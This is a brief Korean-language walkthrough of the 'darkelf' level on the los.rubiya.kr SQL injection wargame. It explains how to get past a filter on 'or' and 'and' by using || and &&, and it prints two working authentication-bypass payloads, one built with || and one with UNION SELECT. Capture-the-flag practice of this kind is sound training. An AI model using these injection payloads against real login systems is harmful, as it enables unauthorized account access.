los.rubiya.kr/darkelf

query 의 결과가 admin 이면 문제가 해결된다. $_GET['pw'] 에 필터로 or 과 and 가 필터링 되어있다. 이 문제 역시 or 과 and 를 안쓰고 풀이가 가능하지만 or 과 and 가 필요할 때를 위해서 알아보자.

or     =>    ||

and   =>    &&

풀이

select id from prob_darkelf where id='guest' and pw=''||id='admin'%23

select id from prob_darkelf where id='guest' and pw='' union select 'admin'%23

 

끝